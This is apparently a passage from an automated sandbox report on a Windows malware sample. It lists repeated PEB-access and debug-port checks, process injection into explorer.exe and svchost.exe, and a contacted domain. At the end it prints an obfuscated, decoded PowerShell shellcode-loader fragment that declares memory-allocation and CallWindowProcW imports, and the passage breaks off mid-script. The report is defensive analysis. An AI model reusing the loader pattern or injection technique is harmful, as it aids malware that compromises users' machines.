Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h] 22_2_032503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h] 22_2_032503E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324DBE9 mov eax, dword ptr fs:[00000030h] 22_2_0324DBE9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A53CA mov eax, dword ptr fs:[00000030h] 22_2_032A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A53CA mov eax, dword ptr fs:[00000030h] 22_2_032A53CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03264A2C mov eax, dword ptr fs:[00000030h] 22_2_03264A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03264A2C mov eax, dword ptr fs:[00000030h] 22_2_03264A2C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03238A0A mov eax, dword ptr fs:[00000030h] 22_2_03238A0A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03225210 mov eax, dword ptr fs:[00000030h] 22_2_03225210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03225210 mov ecx, dword ptr fs:[00000030h] 22_2_03225210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03225210 mov eax, dword ptr fs:[00000030h] 22_2_03225210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03225210 mov eax, dword ptr fs:[00000030h] 22_2_03225210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322AA16 mov eax, dword ptr fs:[00000030h] 22_2_0322AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322AA16 mov eax, dword ptr fs:[00000030h] 22_2_0322AA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03243A1C mov eax, dword ptr fs:[00000030h] 22_2_03243A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAA16 mov eax, dword ptr fs:[00000030h] 22_2_032EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAA16 mov eax, dword ptr fs:[00000030h] 22_2_032EAA16
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DB260 mov eax, dword ptr fs:[00000030h] 22_2_032DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DB260 mov eax, dword ptr fs:[00000030h] 22_2_032DB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8A62 mov eax, dword ptr fs:[00000030h] 22_2_032F8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0326927A mov eax, dword ptr fs:[00000030h] 22_2_0326927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229240 mov eax, dword ptr fs:[00000030h] 22_2_03229240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229240 mov eax, dword ptr fs:[00000030h] 22_2_03229240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229240 mov eax, dword ptr fs:[00000030h] 22_2_03229240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229240 mov eax, dword ptr fs:[00000030h] 22_2_03229240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EEA55 mov eax, dword ptr fs:[00000030h] 22_2_032EEA55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032B4257 mov eax, dword ptr fs:[00000030h] 22_2_032B4257
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h] 22_2_032252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h] 22_2_032252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h] 22_2_032252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h] 22_2_032252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h] 22_2_032252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323AAB0 mov eax, dword ptr fs:[00000030h] 22_2_0323AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323AAB0 mov eax, dword ptr fs:[00000030h] 22_2_0323AAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325FAB0 mov eax, dword ptr fs:[00000030h] 22_2_0325FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325D294 mov eax, dword ptr fs:[00000030h] 22_2_0325D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325D294 mov eax, dword ptr fs:[00000030h] 22_2_0325D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252AE4 mov eax, dword ptr fs:[00000030h] 22_2_03252AE4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252ACB mov eax, dword ptr fs:[00000030h] 22_2_03252ACB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 mov eax, dword ptr fs:[00000030h] 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 mov eax, dword ptr fs:[00000030h] 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 mov eax, dword ptr fs:[00000030h] 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 mov eax, dword ptr fs:[00000030h] 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03244120 mov ecx, dword ptr fs:[00000030h] 22_2_03244120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325513A mov eax, dword ptr fs:[00000030h] 22_2_0325513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325513A mov eax, dword ptr fs:[00000030h] 22_2_0325513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229100 mov eax, dword ptr fs:[00000030h] 22_2_03229100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229100 mov eax, dword ptr fs:[00000030h] 22_2_03229100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229100 mov eax, dword ptr fs:[00000030h] 22_2_03229100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C962 mov eax, dword ptr fs:[00000030h] 22_2_0322C962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322B171 mov eax, dword ptr fs:[00000030h] 22_2_0322B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322B171 mov eax, dword ptr fs:[00000030h] 22_2_0322B171
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324B944 mov eax, dword ptr fs:[00000030h] 22_2_0324B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324B944 mov eax, dword ptr fs:[00000030h] 22_2_0324B944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032561A0 mov eax, dword ptr fs:[00000030h] 22_2_032561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032561A0 mov eax, dword ptr fs:[00000030h] 22_2_032561A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A69A6 mov eax, dword ptr fs:[00000030h] 22_2_032A69A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h] 22_2_032A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h] 22_2_032A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h] 22_2_032A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h] 22_2_032A51BE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A185 mov eax, dword ptr fs:[00000030h] 22_2_0325A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324C182 mov eax, dword ptr fs:[00000030h] 22_2_0324C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252990 mov eax, dword ptr fs:[00000030h] 22_2_03252990
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032B41E8 mov eax, dword ptr fs:[00000030h] 22_2_032B41E8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h] 22_2_0322B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h] 22_2_0322B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h] 22_2_0322B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325002D mov eax, dword ptr fs:[00000030h] 22_2_0325002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325002D mov eax, dword ptr fs:[00000030h] 22_2_0325002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325002D mov eax, dword ptr fs:[00000030h] 22_2_0325002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325002D mov eax, dword ptr fs:[00000030h] 22_2_0325002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325002D mov eax, dword ptr fs:[00000030h] 22_2_0325002D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h] 22_2_0323B02A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h] 22_2_032F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h] 22_2_032F4015
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h] 22_2_032A7016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F1074 mov eax, dword ptr fs:[00000030h] 22_2_032F1074
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E2073 mov eax, dword ptr fs:[00000030h] 22_2_032E2073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03240050 mov eax, dword ptr fs:[00000030h] 22_2_03240050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03240050 mov eax, dword ptr fs:[00000030h] 22_2_03240050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h] 22_2_032520A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032690AF mov eax, dword ptr fs:[00000030h] 22_2_032690AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov ecx, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h] 22_2_0325F0BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03229080 mov eax, dword ptr fs:[00000030h] 22_2_03229080
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h] 22_2_032A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h] 22_2_032A3884
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032258EC mov eax, dword ptr fs:[00000030h] 22_2_032258EC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov ecx, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h] 22_2_032BB8D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h] 22_2_03224F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h] 22_2_03224F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325E730 mov eax, dword ptr fs:[00000030h] 22_2_0325E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F070D mov eax, dword ptr fs:[00000030h] 22_2_032F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F070D mov eax, dword ptr fs:[00000030h] 22_2_032F070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h] 22_2_0325A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h] 22_2_0325A70E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324F716 mov eax, dword ptr fs:[00000030h] 22_2_0324F716
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h] 22_2_032BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h] 22_2_032BFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323FF60 mov eax, dword ptr fs:[00000030h] 22_2_0323FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8F6A mov eax, dword ptr fs:[00000030h] 22_2_032F8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323EF40 mov eax, dword ptr fs:[00000030h] 22_2_0323EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03238794 mov eax, dword ptr fs:[00000030h] 22_2_03238794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h] 22_2_032A7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032637F5 mov eax, dword ptr fs:[00000030h] 22_2_032637F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322E620 mov eax, dword ptr fs:[00000030h] 22_2_0322E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DFE3F mov eax, dword ptr fs:[00000030h] 22_2_032DFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h] 22_2_0322C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03258E00 mov eax, dword ptr fs:[00000030h] 22_2_03258E00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032E1608 mov eax, dword ptr fs:[00000030h] 22_2_032E1608
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h] 22_2_0325A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h] 22_2_0325A61C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323766D mov eax, dword ptr fs:[00000030h] 22_2_0323766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h] 22_2_0324AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h] 22_2_03237E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h] 22_2_032EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h] 22_2_032EAE44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h] 22_2_032F0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A46A7 mov eax, dword ptr fs:[00000030h] 22_2_032A46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032BFE87 mov eax, dword ptr fs:[00000030h] 22_2_032BFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032376E2 mov eax, dword ptr fs:[00000030h] 22_2_032376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032516E0 mov ecx, dword ptr fs:[00000030h] 22_2_032516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03268EC7 mov eax, dword ptr fs:[00000030h] 22_2_03268EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032536CC mov eax, dword ptr fs:[00000030h] 22_2_032536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032DFEC0 mov eax, dword ptr fs:[00000030h] 22_2_032DFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8ED6 mov eax, dword ptr fs:[00000030h] 22_2_032F8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0322AD30 mov eax, dword ptr fs:[00000030h] 22_2_0322AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h] 22_2_03233D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EE539 mov eax, dword ptr fs:[00000030h] 22_2_032EE539
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F8D34 mov eax, dword ptr fs:[00000030h] 22_2_032F8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032AA537 mov eax, dword ptr fs:[00000030h] 22_2_032AA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h] 22_2_03254D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h] 22_2_0324C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h] 22_2_0324C577
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03263D43 mov eax, dword ptr fs:[00000030h] 22_2_03263D43
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032A3540 mov eax, dword ptr fs:[00000030h] 22_2_032A3540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03247D50 mov eax, dword ptr fs:[00000030h] 22_2_03247D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h] 22_2_032F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h] 22_2_032F05AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032535A1 mov eax, dword ptr fs:[00000030h] 22_2_032535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h] 22_2_03251DB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03252581 mov eax, dword ptr fs:[00000030h] 22_2_03252581
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h] 22_2_03222D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h] 22_2_0325FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h] 22_2_0325FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h] 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h] 22_2_0323D5E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h] 22_2_032EFDE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_1EA296E0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.ordemt.com
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 8F0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #LACTIFERO brego Knobetsfri9 Hest3 Gruesom4 Generalis AFMEJ beaver BIBLIOGR Ddmandskn5 nullin lnpotsyste Threapedaf Outwres GTEVIV Unshackli8 corre LARMENSF Distingv8 disembo HYPE Unfil9 VANDBRNDA Genne Bemestre4 indpa Bitsyle Ternashe Kokard Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class brnecykl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);}"@#Bisamschu Doven8 Caly Kuldioxid grafikruti Lkkern Kanoni9 Chel9 endeballen disk Tadeawouc4 Uitotanud8 Cutlassf4 Rhip8 Tendereeo reinhold Hjemviselu9 HURRS Omni6 Biggis5 Ohmav4 Buch Peggypara nvningedo FOELGESED Test-Path 